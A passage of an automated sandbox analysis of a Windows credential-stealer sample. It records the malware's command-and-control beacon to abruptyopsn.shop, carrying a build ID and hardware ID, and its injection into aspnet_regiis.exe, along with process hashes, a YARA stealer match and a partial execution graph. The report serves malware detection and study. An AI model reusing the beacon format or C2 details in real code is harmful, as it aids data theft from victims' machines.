                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JnoFNyowqQ1pAsgePy%2BEAisDykBx9E5TUbgAqe1u0NhTixDDFYXrWM7Q35%2BZqDxaLzAOJH8JSi9Tf6flfZOEahaEynwihzFUsEehMAb8Khc1uJtz1QajwtEAbBw4Iak0faHE"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fa4aa982d0dc461-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1669&min_rtt=1664&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=3051&recv_bytes=2005&delivery_rate=2562902&cwnd=229&unsent_bytes=0&cid=4c25f28f183d68fd&ts=1128&x=0"
                                                                                  2024-12-30 20:09:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                  Data Ascii: fok 8.46.123.189
                                                                                  2024-12-30 20:09:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.449746104.21.48.14432492C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-30 20:09:15 UTC265OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 121
                                                                                  Host: abruptyopsn.shop
                                                                                  2024-12-30 20:09:15 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 37 33 66 38 32 65 65 64 36 35 32 31 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 34 30 43 39 31 34 41 46 39 34 37 41 41 35 38 44 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31
                                                                                  Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--73f82eed6521&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=40C914AF947AA58D20A4C476FD51BCB1
                                                                                  2024-12-30 20:09:16 UTC1124INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Dec 2024 20:09:16 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=s0cnhn3o1c205r9h547ortsdnr; expires=Fri, 25 Apr 2025 13:55:55 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  X-Frame-Options: DENY
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aWSzIbtMZWhNRImwGpK5Gqz2VRVTGYUnFSzw65ji3MqXmMUMU4kv8xab%2BKGUPfiL4OxoceBxLpTRCX5ch7kUamDMM%2B%2FsfvNFZhw3AxlBotWjq7zoP%2FiAAZHsl9MQ9Cgqe26H"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fa4aaa23a5143be-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1577&rtt_var=601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3052&recv_bytes=1022&delivery_rate=2712074&cwnd=227&unsent_bytes=0&cid=7fa6def4b1ebbbfc&ts=479&x=0"
                                                                                  2024-12-30 20:09:16 UTC54INData Raw: 33 30 0d 0a 45 4e 39 63 50 34 31 44 54 42 42 38 69 66 63 2b 53 37 30 47 79 6a 4b 31 6c 78 73 55 33 39 54 52 74 6b 76 4a 6c 50 56 31 42 6c 35 4c 67 67 3d 3d 0d 0a
                                                                                  Data Ascii: 30EN9cP41DTBB8ifc+S70GyjK1lxsU39TRtkvJlPV1Bl5Lgg==
                                                                                  2024-12-30 20:09:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to dive into process behavior distribution

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:15:09:02
                                                                                  Start date:30/12/2024
                                                                                  Path:C:\Users\user\Desktop\ReploidReplic.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\ReploidReplic.exe"
                                                                                  Imagebase:0x800000
                                                                                  File size:707'584 bytes
                                                                                  MD5 hash:7DB52DDA50A584C20D69A00D2B13C63D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:15:09:02
                                                                                  Start date:30/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:15:09:03
                                                                                  Start date:30/12/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                  Imagebase:0x910000
                                                                                  File size:43'016 bytes
                                                                                  MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1822946164.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:15:09:03
                                                                                  Start date:30/12/2024
                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 1224
                                                                                  Imagebase:0x3c0000
                                                                                  File size:483'680 bytes
                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:12.4%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:7.6%
                                                                                    Total number of Nodes:1484
                                                                                    Total number of Limit Nodes:12
                                                                                    execution_graph 11847 6ce10de0 11848 6ce10dfe 11847->11848 11859 6ce10da0 11848->11859 11860 6ce10db2 11859->11860 11861 6ce10dbf 11859->11861 11862 6ce0fa90 _ValidateLocalCookies 5 API calls 11860->11862 11862->11861 11981 6ce11160 11982 6ce11172 11981->11982 11983 6ce11180 11981->11983 11984 6ce0fa90 _ValidateLocalCookies 5 API calls 11982->11984 11984->11983 11985 6ce15560 11988 6ce154e7 11985->11988 11989 6ce154f3 ___scrt_is_nonwritable_in_current_image 11988->11989 11996 6ce12bda EnterCriticalSection 11989->11996 11991 6ce1552b 11997 6ce15549 11991->11997 11993 6ce154fd 11993->11991 11995 6ce158f5 __fassign 14 API calls 11993->11995 11995->11993 11996->11993 12000 6ce12c22 LeaveCriticalSection 11997->12000 11999 6ce15537 12000->11999 11863 6ce119e5 11864 6ce12378 37 API calls 11863->11864 11865 6ce119ed 11864->11865 11866 6ce15be9 11869 6ce1599e 11866->11869 11867 6ce0fa90 _ValidateLocalCookies 5 API calls 11868 6ce159ab 11867->11868 11869->11867 11869->11869 11040 6ce180eb IsProcessorFeaturePresent 11041 6ce15ef1 11043 6ce15e3e 11041->11043 11042 6ce15e56 11044 6ce15e6a 11042->11044 11045 6ce12ed3 _free 14 API calls 11042->11045 11043->11042 11043->11044 11048 6ce15e8e 11043->11048 11046 6ce15e60 11045->11046 11047 6ce12e16 __fassign 25 API calls 11046->11047 11047->11044 11048->11044 11049 6ce12ed3 _free 14 API calls 11048->11049 11049->11046 12001 6ce0fd73 ___scrt_dllmain_exception_filter 11146 6ce12274 11147 6ce12f43 _free 14 API calls 11146->11147 11148 6ce12282 11147->11148 11149 6ce12f43 _free 14 API calls 11148->11149 11150 6ce12295 11149->11150 11151 6ce12f43 _free 14 API calls 11150->11151 11152 6ce122a6 11151->11152 11153 6ce12f43 _free 14 API calls 11152->11153 11154 6ce122b7 11153->11154 11870 6ce11ff7 11871 6ce1200f 11870->11871 11872 6ce12009 11870->11872 11873 6ce11f9f 14 API calls 11872->11873 11873->11871 12002 6ce11b78 12003 6ce11b8f 12002->12003 12013 6ce11b88 12002->12013 12004 6ce11bb0 12003->12004 12006 6ce11b9a 12003->12006 12005 6ce13e6a 47 API calls 12004->12005 12008 6ce11bb6 12005->12008 12007 6ce12ed3 _free 14 API calls 12006->12007 12009 6ce11b9f 12007->12009 12026 6ce138b1 GetModuleFileNameW 12008->12026 12011 6ce12e16 __fassign 25 API calls 12009->12011 12011->12013 12018 6ce11c20 12021 6ce11cae 37 API calls 12018->12021 12019 6ce11c14 12020 6ce12ed3 _free 14 API calls 12019->12020 12022 6ce11c19 12020->12022 12024 6ce11c38 12021->12024 12023 6ce12f43 _free 14 API calls 12022->12023 12023->12013 12024->12022 12025 6ce12f43 _free 14 API calls 12024->12025 12025->12022 12027 6ce138f1 12026->12027 12028 6ce138e0 GetLastError 12026->12028 12048 6ce1362a 12027->12048 12029 6ce12e9d __dosmaperr 14 API calls 12028->12029 12031 6ce138ec 12029->12031 12034 6ce0fa90 _ValidateLocalCookies 5 API calls 12031->12034 12035 6ce11bc9 12034->12035 12036 6ce11cae 12035->12036 12038 6ce11cd3 12036->12038 12040 6ce11d33 12038->12040 12084 6ce14190 12038->12084 12039 6ce11bfe 12042 6ce11e22 12039->12042 12040->12039 12041 6ce14190 37 API calls 12040->12041 12041->12040 12043 6ce11e33 12042->12043 12047 6ce11c0b 12042->12047 12044 6ce12ee6 _free 14 API calls 12043->12044 12043->12047 12045 6ce11e5c 12044->12045 12046 6ce12f43 _free 14 API calls 12045->12046 12046->12047 12047->12018 12047->12019 12049 6ce1246d __fassign 37 API calls 12048->12049 12050 6ce1363c 12049->12050 12052 6ce1364e 12050->12052 12074 6ce145f4 12050->12074 12053 6ce137af 12052->12053 12054 6ce137cb 12053->12054 12070 6ce137bc 12053->12070 12055 6ce137d3 12054->12055 12056 6ce137f8 12054->12056 12055->12070 12080 6ce13876 12055->12080 12057 6ce1423d ___scrt_uninitialize_crt WideCharToMultiByte 12056->12057 12058 6ce13808 12057->12058 12060 6ce13825 12058->12060 12061 6ce1380f GetLastError 12058->12061 12063 6ce13836 12060->12063 12065 6ce13876 14 API calls 12060->12065 12062 6ce12e9d __dosmaperr 14 API calls 12061->12062 12064 6ce1381b 12062->12064 12066 6ce1423d ___scrt_uninitialize_crt WideCharToMultiByte 12063->12066 12063->12070 12068 6ce12ed3 _free 14 API calls 12064->12068 12065->12063 12067 6ce1384e 12066->12067 12069 6ce13855 GetLastError 12067->12069 12067->12070 12068->12070 12071 6ce12e9d __dosmaperr 14 API calls 12069->12071 12070->12031 12072 6ce13861 12071->12072 12073 6ce12ed3 _free 14 API calls 12072->12073 12073->12070 12077 6ce1441c 12074->12077 12078 6ce14531 _free 5 API calls 12077->12078 12079 6ce14432 12078->12079 12079->12052 12081 6ce13881 12080->12081 12082 6ce12ed3 _free 14 API calls 12081->12082 12083 6ce1388a 12082->12083 12083->12070 12087 6ce14139 12084->12087 12088 6ce1246d __fassign 37 API calls 12087->12088 12089 6ce1414d 12088->12089 12089->12038 11155 6ce11e7d 11166 6ce13e6a 11155->11166 11159 6ce11e9a 11162 6ce12f43 _free 14 API calls 11159->11162 11164 6ce11ec9 11162->11164 11165 6ce12f43 _free 14 API calls 11165->11159 11167 6ce13e73 11166->11167 11168 6ce11e8f 11166->11168 11201 6ce12a04 11167->11201 11172 6ce1432b GetEnvironmentStringsW 11168->11172 11173 6ce14342 11172->11173 11174 6ce14398 11172->11174 11177 6ce1423d ___scrt_uninitialize_crt WideCharToMultiByte 11173->11177 11175 6ce143a1 FreeEnvironmentStringsW 11174->11175 11176 6ce11e94 11174->11176 11175->11176 11176->11159 11184 6ce11ecf 11176->11184 11178 6ce1435b 11177->11178 11178->11174 11179 6ce152bc 15 API calls 11178->11179 11180 6ce1436b 11179->11180 11181 6ce14383 11180->11181 11182 6ce1423d ___scrt_uninitialize_crt WideCharToMultiByte 11180->11182 11183 6ce12f43 _free 14 API calls 11181->11183 11182->11181 11183->11174 11185 6ce11ee4 11184->11185 11186 6ce12ee6 _free 14 API calls 11185->11186 11188 6ce11f0b 11186->11188 11187 6ce11f70 11189 6ce12f43 _free 14 API calls 11187->11189 11188->11187 11191 6ce12ee6 _free 14 API calls 11188->11191 11192 6ce11f72 11188->11192 11197 6ce11f92 11188->11197 11199 6ce12f43 _free 14 API calls 11188->11199 11541 6ce123cf 11188->11541 11190 6ce11ea5 11189->11190 11190->11165 11191->11188 11550 6ce11f9f 11192->11550 11196 6ce12f43 _free 14 API calls 11196->11187 11556 6ce12e26 IsProcessorFeaturePresent 11197->11556 11199->11188 11200 6ce11f9e 11202 6ce12a15 11201->11202 11203 6ce12a0f 11201->11203 11205 6ce146d0 _free 6 API calls 11202->11205 11223 6ce12a1b 11202->11223 11204 6ce14691 _free 6 API calls 11203->11204 11204->11202 11206 6ce12a2f 11205->11206 11208 6ce12ee6 _free 14 API calls 11206->11208 11206->11223 11209 6ce12a3f 11208->11209 11211 6ce12a47 11209->11211 11212 6ce12a5c 11209->11212 11214 6ce146d0 _free 6 API calls 11211->11214 11215 6ce146d0 _free 6 API calls 11212->11215 11213 6ce12a94 11226 6ce13cb6 11213->11226 11216 6ce12a53 11214->11216 11217 6ce12a68 11215->11217 11220 6ce12f43 _free 14 API calls 11216->11220 11218 6ce12a7b 11217->11218 11219 6ce12a6c 11217->11219 11222 6ce12749 _free 14 API calls 11218->11222 11221 6ce146d0 _free 6 API calls 11219->11221 11220->11223 11221->11216 11224 6ce12a86 11222->11224 11223->11213 11245 6ce12429 11223->11245 11225 6ce12f43 _free 14 API calls 11224->11225 11225->11223 11340 6ce13dca 11226->11340 11256 6ce14c5c 11245->11256 11249 6ce12443 IsProcessorFeaturePresent 11251 6ce1244f 11249->11251 11250 6ce12462 11292 6ce11b5b 11250->11292 11286 6ce12c6a 11251->11286 11253 6ce12439 11253->11249 11253->11250 11295 6ce14b8e 11256->11295 11259 6ce14ca1 11260 6ce14cad ___scrt_is_nonwritable_in_current_image 11259->11260 11261 6ce12a9e _free 14 API calls 11260->11261 11264 6ce14cda __fassign 11260->11264 11268 6ce14cd4 __fassign 11260->11268 11261->11268 11262 6ce14d21 11263 6ce12ed3 _free 14 API calls 11262->11263 11265 6ce14d26 11263->11265 11267 6ce14d4d 11264->11267 11306 6ce12bda EnterCriticalSection 11264->11306 11266 6ce12e16 __fassign 25 API calls 11265->11266 11285 6ce14d0b 11266->11285 11271 6ce14e80 11267->11271 11272 6ce14d8f 11267->11272 11282 6ce14dbe 11267->11282 11268->11262 11268->11264 11268->11285 11273 6ce14e8b 11271->11273 11338 6ce12c22 LeaveCriticalSection 11271->11338 11272->11282 11307 6ce12947 GetLastError 11272->11307 11276 6ce11b5b __fassign 23 API calls 11273->11276 11278 6ce14e93 11276->11278 11280 6ce12947 __fassign 37 API calls 11283 6ce14e13 11280->11283 11281 6ce12947 __fassign 37 API calls 11281->11282 11334 6ce14e2d 11282->11334 11284 6ce12947 __fassign 37 API calls 11283->11284 11283->11285 11284->11285 11285->11253 11287 6ce12c86 __DllMainCRTStartup@12 11286->11287 11288 6ce12cb2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11287->11288 11291 6ce12d83 __DllMainCRTStartup@12 11288->11291 11289 6ce0fa90 _ValidateLocalCookies 5 API calls 11290 6ce12da1 11289->11290 11290->11250 11291->11289 11293 6ce11a01 __DllMainCRTStartup@12 23 API calls 11292->11293 11294 6ce11b6c 11293->11294 11296 6ce14b9a ___scrt_is_nonwritable_in_current_image 11295->11296 11301 6ce12bda EnterCriticalSection 11296->11301 11298 6ce14ba8 11302 6ce14be6 11298->11302 11301->11298 11305 6ce12c22 LeaveCriticalSection 11302->11305 11304 6ce1242e 11304->11253 11304->11259 11305->11304 11306->11267 11308 6ce12964 11307->11308 11309 6ce1295e 11307->11309 11311 6ce146d0 _free 6 API calls 11308->11311 11332 6ce1296a SetLastError 11308->11332 11310 6ce14691 _free 6 API calls 11309->11310 11310->11308 11312 6ce12982 11311->11312 11313 6ce12ee6 _free 14 API calls 11312->11313 11312->11332 11314 6ce12992 11313->11314 11316 6ce129b1 11314->11316 11317 6ce1299a 11314->11317 11322 6ce146d0 _free 6 API calls 11316->11322 11320 6ce146d0 _free 6 API calls 11317->11320 11318 6ce129f8 11318->11281 11319 6ce129fe 11321 6ce12429 __fassign 35 API calls 11319->11321 11325 6ce129a8 11320->11325 11323 6ce12a03 11321->11323 11324 6ce129bd 11322->11324 11326 6ce129c1 11324->11326 11327 6ce129d2 11324->11327 11328 6ce12f43 _free 14 API calls 11325->11328 11329 6ce146d0 _free 6 API calls 11326->11329 11330 6ce12749 _free 14 API calls 11327->11330 11328->11332 11329->11325 11331 6ce129dd 11330->11331 11333 6ce12f43 _free 14 API calls 11331->11333 11332->11318 11332->11319 11333->11332 11335 6ce14e33 11334->11335 11336 6ce14e04 11334->11336 11339 6ce12c22 LeaveCriticalSection 11335->11339 11336->11280 11336->11283 11336->11285 11338->11273 11339->11336 11341 6ce13dd6 ___scrt_is_nonwritable_in_current_image 11340->11341 11342 6ce13df0 11341->11342 11384 6ce12bda EnterCriticalSection 11341->11384 11344 6ce13cc9 11342->11344 11347 6ce12429 __fassign 37 API calls 11342->11347 11351 6ce13a60 11344->11351 11345 6ce13e2c 11385 6ce13e49 11345->11385 11348 6ce13e69 11347->11348 11349 6ce13e00 11349->11345 11350 6ce12f43 _free 14 API calls 11349->11350 11350->11345 11389 6ce1246d 11351->11389 11384->11349 11388 6ce12c22 LeaveCriticalSection 11385->11388 11387 6ce13e50 11387->11342 11388->11387 11390 6ce1248d 11389->11390 11391 6ce12947 __fassign 37 API calls 11390->11391 11392 6ce124ad 11391->11392 11396 6ce15466 11392->11396 11397 6ce124c3 11396->11397 11398 6ce15479 11396->11398 11400 6ce15493 11397->11400 11398->11397 11404 6ce15874 11398->11404 11401 6ce154bb 11400->11401 11402 6ce154a6 11400->11402 11402->11401 11426 6ce13eb2 11402->11426 11405 6ce15880 ___scrt_is_nonwritable_in_current_image 11404->11405 11406 6ce12947 __fassign 37 API calls 11405->11406 11407 6ce15889 11406->11407 11414 6ce158cf 11407->11414 11417 6ce12bda EnterCriticalSection 11407->11417 11409 6ce158a7 11418 6ce158f5 11409->11418 11414->11397 11415 6ce12429 __fassign 37 API calls 11416 6ce158f4 11415->11416 11417->11409 11419 6ce15903 __fassign 11418->11419 11421 6ce158b8 11418->11421 11420 6ce15628 __fassign 14 API calls 11419->11420 11419->11421 11420->11421 11422 6ce158d4 11421->11422 11425 6ce12c22 LeaveCriticalSection 11422->11425 11424 6ce158cb 11424->11414 11424->11415 11425->11424 11427 6ce12947 __fassign 37 API calls 11426->11427 11428 6ce13ebc 11427->11428 11429 6ce13dca __fassign 37 API calls 11428->11429 11430 6ce13ec2 11429->11430 11430->11401 11542 6ce123ea 11541->11542 11543 6ce123dc 11541->11543 11544 6ce12ed3 _free 14 API calls 11542->11544 11543->11542 11548 6ce12401 11543->11548 11545 6ce123f2 11544->11545 11546 6ce12e16 __fassign 25 API calls 11545->11546 11547 6ce123fc 11546->11547 11547->11188 11548->11547 11549 6ce12ed3 _free 14 API calls 11548->11549 11549->11545 11551 6ce11f78 11550->11551 11552 6ce11fac 11550->11552 11551->11196 11553 6ce11fc3 11552->11553 11555 6ce12f43 _free 14 API calls 11552->11555 11554 6ce12f43 _free 14 API calls 11553->11554 11554->11551 11555->11552 11557 6ce12e32 11556->11557 11558 6ce12c6a __fassign 8 API calls 11557->11558 11559 6ce12e47 GetCurrentProcess TerminateProcess 11558->11559 11559->11200 11880 6ce17bc1 11881 6ce17be1 11880->11881 11884 6ce17c18 11881->11884 11883 6ce17c0b 11885 6ce17c1f 11884->11885 11886 6ce17cbe 11885->11886 11888 6ce17c3f 11885->11888 11889 6ce189a7 20 API calls 11886->11889 11887 6ce188d0 11887->11883 11888->11883 11888->11887 11891 6ce189a7 20 API calls 11888->11891 11890 6ce17cce 11889->11890 11890->11883 11892 6ce188ce 11891->11892 11892->11883 12090 6ce15f40 12093 6ce15f57 12090->12093 12092 6ce15f52 12094 6ce15f65 12093->12094 12095 6ce15f79 12093->12095 12096 6ce12ed3 _free 14 API calls 12094->12096 12097 6ce15f81 12095->12097 12098 6ce15f93 12095->12098 12099 6ce15f6a 12096->12099 12100 6ce12ed3 _free 14 API calls 12097->12100 12101 6ce1246d __fassign 37 API calls 12098->12101 12105 6ce15f91 12098->12105 12102 6ce12e16 __fassign 25 API calls 12099->12102 12103 6ce15f86 12100->12103 12101->12105 12106 6ce15f75 12102->12106 12104 6ce12e16 __fassign 25 API calls 12103->12104 12104->12105 12105->12092 12106->12092 11560 6ce13047 11561 6ce13071 11560->11561 11562 6ce13055 11560->11562 11564 6ce13098 11561->11564 11565 6ce13078 11561->11565 11583 6ce13669 11562->11583 11566 6ce1423d ___scrt_uninitialize_crt WideCharToMultiByte 11564->11566 11571 6ce1305f 11565->11571 11587 6ce13683 11565->11587 11567 6ce130a8 11566->11567 11569 6ce130c5 11567->11569 11570 6ce130af GetLastError 11567->11570 11573 6ce130d6 11569->11573 11575 6ce13683 15 API calls 11569->11575 11592 6ce12e9d 11570->11592 11573->11571 11576 6ce1423d ___scrt_uninitialize_crt WideCharToMultiByte 11573->11576 11575->11573 11578 6ce130ee 11576->11578 11577 6ce12ed3 _free 14 API calls 11577->11571 11578->11571 11579 6ce130f5 GetLastError 11578->11579 11580 6ce12e9d __dosmaperr 14 API calls 11579->11580 11581 6ce13101 11580->11581 11582 6ce12ed3 _free 14 API calls 11581->11582 11582->11571 11584 6ce1367c 11583->11584 11585 6ce13674 11583->11585 11584->11571 11586 6ce12f43 _free 14 API calls 11585->11586 11586->11584 11588 6ce13669 14 API calls 11587->11588 11589 6ce13691 11588->11589 11597 6ce136fe 11589->11597 11600 6ce12ec0 11592->11600 11594 6ce12ea8 _free 11595 6ce12ed3 _free 14 API calls 11594->11595 11596 6ce12ebb 11595->11596 11596->11577 11598 6ce152bc 15 API calls 11597->11598 11599 6ce1369f 11598->11599 11599->11571 11601 6ce12a9e _free 14 API calls 11600->11601 11602 6ce12ec5 11601->11602 11602->11594 11603 6ce15248 11604 6ce15177 ___scrt_uninitialize_crt 66 API calls 11603->11604 11605 6ce15250 11604->11605 11613 6ce17256 11605->11613 11607 6ce15255 11623 6ce17301 11607->11623 11610 6ce1527f 11611 6ce12f43 _free 14 API calls 11610->11611 11612 6ce1528a 11611->11612 11614 6ce17262 ___scrt_is_nonwritable_in_current_image 11613->11614 11627 6ce12bda EnterCriticalSection 11614->11627 11616 6ce172d9 11641 6ce172f8 11616->11641 11617 6ce1726d 11617->11616 11619 6ce172ad DeleteCriticalSection 11617->11619 11628 6ce1798b 11617->11628 11622 6ce12f43 _free 14 API calls 11619->11622 11622->11617 11624 6ce17318 11623->11624 11625 6ce15264 DeleteCriticalSection 11623->11625 11624->11625 11626 6ce12f43 _free 14 API calls 11624->11626 11625->11607 11625->11610 11626->11625 11627->11617 11629 6ce17997 ___scrt_is_nonwritable_in_current_image 11628->11629 11630 6ce179a1 11629->11630 11631 6ce179b6 11629->11631 11632 6ce12ed3 _free 14 API calls 11630->11632 11638 6ce179b1 11631->11638 11644 6ce15294 EnterCriticalSection 11631->11644 11633 6ce179a6 11632->11633 11635 6ce12e16 __fassign 25 API calls 11633->11635 11635->11638 11636 6ce179d3 11645 6ce17914 11636->11645 11638->11617 11639 6ce179de 11661 6ce17a05 11639->11661 11733 6ce12c22 LeaveCriticalSection 11641->11733 11643 6ce172e5 11643->11607 11644->11636 11646 6ce17921 11645->11646 11647 6ce17936 11645->11647 11648 6ce12ed3 _free 14 API calls 11646->11648 11649 6ce150ca ___scrt_uninitialize_crt 62 API calls 11647->11649 11659 6ce17931 11647->11659 11650 6ce17926 11648->11650 11651 6ce1794b 11649->11651 11652 6ce12e16 __fassign 25 API calls 11650->11652 11653 6ce17301 14 API calls 11651->11653 11652->11659 11654 6ce17953 11653->11654 11655 6ce154c0 ___scrt_uninitialize_crt 25 API calls 11654->11655 11656 6ce17959 11655->11656 11664 6ce17f87 11656->11664 11659->11639 11660 6ce12f43 _free 14 API calls 11660->11659 11732 6ce152a8 LeaveCriticalSection 11661->11732 11663 6ce17a0d 11663->11638 11665 6ce17f98 11664->11665 11666 6ce17fad 11664->11666 11667 6ce12ec0 __dosmaperr 14 API calls 11665->11667 11668 6ce17ff6 11666->11668 11673 6ce17fd4 11666->11673 11670 6ce17f9d 11667->11670 11669 6ce12ec0 __dosmaperr 14 API calls 11668->11669 11671 6ce17ffb 11669->11671 11672 6ce12ed3 _free 14 API calls 11670->11672 11674 6ce12ed3 _free 14 API calls 11671->11674 11677 6ce1795f 11672->11677 11679 6ce17efb 11673->11679 11676 6ce18003 11674->11676 11678 6ce12e16 __fassign 25 API calls 11676->11678 11677->11659 11677->11660 11678->11677 11680 6ce17f07 ___scrt_is_nonwritable_in_current_image 11679->11680 11690 6ce165af EnterCriticalSection 11680->11690 11682 6ce17f15 11683 6ce17f47 11682->11683 11684 6ce17f3c 11682->11684 11686 6ce12ed3 _free 14 API calls 11683->11686 11691 6ce18014 11684->11691 11687 6ce17f42 11686->11687 11706 6ce17f7b 11687->11706 11690->11682 11709 6ce16686 11691->11709 11693 6ce1802a 11722 6ce165f5 11693->11722 11695 6ce18024 11695->11693 11696 6ce16686 ___scrt_uninitialize_crt 25 API calls 11695->11696 11705 6ce1805c 11695->11705 11700 6ce18053 11696->11700 11697 6ce16686 ___scrt_uninitialize_crt 25 API calls 11701 6ce18068 CloseHandle 11697->11701 11698 6ce180a4 11698->11687 11703 6ce16686 ___scrt_uninitialize_crt 25 API calls 11700->11703 11701->11693 11704 6ce18074 GetLastError 11701->11704 11702 6ce12e9d __dosmaperr 14 API calls 11702->11698 11703->11705 11704->11693 11705->11693 11705->11697 11731 6ce165d2 LeaveCriticalSection 11706->11731 11708 6ce17f64 11708->11677 11710 6ce16693 11709->11710 11711 6ce166a8 11709->11711 11712 6ce12ec0 __dosmaperr 14 API calls 11710->11712 11713 6ce12ec0 __dosmaperr 14 API calls 11711->11713 11715 6ce166cd 11711->11715 11714 6ce16698 11712->11714 11716 6ce166d8 11713->11716 11717 6ce12ed3 _free 14 API calls 11714->11717 11715->11695 11718 6ce12ed3 _free 14 API calls 11716->11718 11719 6ce166a0 11717->11719 11720 6ce166e0 11718->11720 11719->11695 11721 6ce12e16 __fassign 25 API calls 11720->11721 11721->11719 11723 6ce16604 11722->11723 11724 6ce1666b 11722->11724 11723->11724 11729 6ce1662e 11723->11729 11725 6ce12ed3 _free 14 API calls 11724->11725 11726 6ce16670 11725->11726 11727 6ce12ec0 __dosmaperr 14 API calls 11726->11727 11728 6ce1665b 11727->11728 11728->11698 11728->11702 11729->11728 11730 6ce16655 SetStdHandle 11729->11730 11730->11728 11731->11708 11732->11663 11733->11643 11050 6ce134cd 11051 6ce134de 11050->11051 11052 6ce12f43 _free 14 API calls 11051->11052 11053 6ce13619 11051->11053 11052->11053 11054 6ce0fa90 _ValidateLocalCookies 5 API calls 11053->11054 11055 6ce13628 11054->11055 11734 6ce1484c GetProcessHeap 11056 6ce17cd1 11057 6ce17cf5 11056->11057 11058 6ce17d0e 11057->11058 11059 6ce18bd7 __startOneArgErrorHandling 11057->11059 11061 6ce17d58 11058->11061 11064 6ce189e3 11058->11064 11063 6ce18c19 __startOneArgErrorHandling 11059->11063 11072 6ce19015 11059->11072 11065 6ce189f6 DecodePointer 11064->11065 11066 6ce18a06 11064->11066 11065->11066 11067 